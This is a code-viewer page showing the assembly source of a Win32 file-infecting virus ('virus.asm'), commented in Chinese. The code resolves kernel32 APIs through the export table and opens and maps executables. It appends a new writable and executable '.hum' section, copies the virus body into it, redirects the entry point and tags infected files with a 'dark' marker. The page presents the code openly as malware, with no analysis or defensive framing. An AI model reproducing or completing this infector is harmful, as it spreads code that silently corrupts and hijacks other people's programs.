📄 virus.asm
字号:
add esi,[ecx+78h]
;得到esi=IMAGE_EXPORT_DIRECTORY入口
add eax,[esi+1ch] ;eax=AddressOfFunctions的地址
mov ADDRofFun,eax
mov ecx,[esi+18h] ;ecx=NumberOfNames
add edx,[esi+24h] ;edx=AddressOfNameOrdinals
add edi,[esi+20h] ;esi=AddressOfNames
invoke K32_api_retrieve,Base,sApi
mov ebx,ADDRofFun
mov eax,[ebx+eax*4] ;要*4才得到偏移
add eax,Base ;加上Base!
mov [esp+7*4],eax ;eax返回api地址
popad
ret
GetApiA endp
u32 db "User32.dll",0
k32 db "Kernel32.dll",0
appBase dd ?
k32Base dd ?
;-----------------------------------------apis needed
lpApiAddrs label near
dd offset sGetModuleHandle
dd offset sGetProcAddress
dd offset sLoadLibrary
dd offset sCreateFile
dd offset sCreateFileMapping
dd offset sMapViewOfFile
dd offset sUnmapViewOfFile
dd offset sCloseHandle
dd offset sGetFileSize
dd offset sSetEndOfFile
dd offset sSetFilePointer
dd offset sExitProcess
dd 0,0
sGetModuleHandle db "GetModuleHandleA",0
sGetProcAddress db "GetProcAddress",0
sLoadLibrary db "LoadLibraryA",0
sCreateFile db "CreateFileA",0
sCreateFileMapping db "CreateFileMappingA",0
sMapViewOfFile db "MapViewOfFile",0
sUnmapViewOfFile db "UnmapViewOfFile",0
sCloseHandle db "CloseHandle",0
sGetFileSize db "GetFileSize",0
sSetFilePointer db "SetFilePointer",0
sSetEndOfFile db "SetEndOfFile",0
sExitProcess db "ExitProcess",0
aGetModuleHandle dd 0
aGetProcAddress dd 0
aLoadLibrary dd 0
aCreateFile dd 0
aCreateFileMapping dd 0
aMapViewOfFile dd 0
aUnmapViewOfFile dd 0
aCloseHandle dd 0
aGetFileSize dd 0
aSetFilePointer dd 0
aSetEndOfFile dd 0
aExitProcess dd 0
;-----------------------------------------
;;========================modipe.asm=================
;修改pe,添加节,实现传染功能
xchg eax,esi
cmp word ptr [esi],'ZM'
jne CouldNotInfect
add esi,[esi+3ch] ;指向PE_HEADER
cmp word ptr [esi],'EP'
jne CouldNotInfect ;是否是PE,否则不感染
cmp dword ptr [esi+8],'dark'
je CouldNotInfect
mov [ebp+pe_Header],esi ;保存pe_Header指针
mov ecx,[esi+74h] ;得到directory的数目
imul ecx,ecx,8
lea eax,[ecx+esi+78h] ;data directory eax->节表起始地址
movzx ecx,word ptr [esi+6h] ;节数目
imul ecx,ecx,28h ;得到所有节表的大小
add eax,ecx ;节结尾...
xchg eax,esi ;eax->Pe_header,esi->最后节开始偏移
;;**************************
;;添加如下结构:
;;name .hum
;;VirtualSize==原size+VirSize
;;VirtualAddress=
;;SizeOfRawData 对齐
;;PointerToRawData
;;PointerToRelocations dd 0
;;PointerToLinenumbers dd ?
;;NumberOfRelocations dw ?
;;NumberOfLinenumbers dw ?
;;Characteristics dd ?
;;**************************
mov dword ptr [esi],'muh.' ;节名.hum
mov dword ptr [esi+8],VirusLen ;实际大小
;计算VirtualSize和V.addr
mov ebx,[eax+38h] ;SectionAlignment
mov [ebp+sec_align],ebx
mov edi,[eax+3ch] ;file align
mov [ebp+file_align],edi
mov ecx,[esi-40+0ch] ;上一节的V.addr
mov eax,[esi-40+8] ;上一节的实际大小
xor edx,edx
div ebx ;除以节对齐
test edx,edx
je @@@1
inc eax
@@@1:
mul ebx ;对齐后的节大小
add eax,ecx ;加上V.addr就是新节的起始V.addr
mov [esi+0ch],eax ;保存新section偏移RVA
add eax,__Start-vBegin
mov [ebp+newEip],eax ;计算新的eip
mov dword ptr [esi+24h],0E0000020h ;属性
mov eax,VirusLen ;计算SizeOfRawData的大小
cdq
div edi ;节的文件对齐
je @@@2
inc eax
@@@2:
mul edi
mov dword ptr [esi+10h],eax ;保存节对齐文件的大小
mov eax,[esi-40+14h]
add eax,[esi-40+10h]
mov [esi+14h],eax ;PointerToRawData更新
mov [ebp+oldEnd],eax ;最后文件增加到...?
mov eax,[ebp+pe_Header]
inc word ptr [eax+6h] ;更新节数目
mov ebx,[eax+28h] ;eip指针偏移
mov [ebp+oldEip],ebx ;保存老指针
mov ebx,[ebp+newEip]
mov [eax+28h],ebx ;更新指针值
;comment $
mov ebx,[eax+50h] ;更新ImageSize
add ebx,VirusLen
mov ecx,[ebp+sec_align]
xor edx,edx
xchg eax,ebx ;eax和ebx交换...
cdq
div ecx
test edx,edx
je @@@3
inc eax
@@@3:
mul ecx
xchg eax,ebx ;还原 eax->pe_Header
mov [eax+50h],ebx ;保更新后的Image_Size大小
;$
mov dword ptr [eax+8],'dark'
cld ;写入
mov ecx,VirusLen
mov edi,[ebp+oldEnd]
add edi,[ebp+pMem]
lea esi,[ebp+vBegin]
rep movsb ;写入文件,all is OK!
xor eax,eax
sub edi,[ebp+pMem]
push FILE_BEGIN
push eax
push edi
push [ebp+hfile]
call [ebp+aSetFilePointer]
push [ebp+hfile]
call [ebp+aSetEndOfFile]
;============================disLen.asm
lea eax,[ebp+u32]
push eax
call dword ptr [ebp+aLoadLibrary]
test eax,eax
jnz @g1
@g1:
lea EDX,[EBP+sMessageBoxA]
push edx
push eax
mov eax,dword ptr [ebp+aGetProcAddress]
call eax
mov [ebp+aMessageBoxA],eax
;-----------------------------------------
mov ebx,VirusLen
mov ecx,8
cld
lea edi,[ebp+val]
L1:
rol ebx,4
call binToAscii
loop L1
push 40h+1000h
lea eax,[ebp+sztit]
push eax
lea eax,[ebp+CopyRight]
push eax
push 0
call [ebp+aMessageBoxA]
jmp __where
;-----------------------------------------
binToAscii proc near
mov eax,ebx
and eax,0fh
add al,30h
cmp al,39h
jbe @f
add al,7
@@:
stosb
ret
binToAscii endp
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -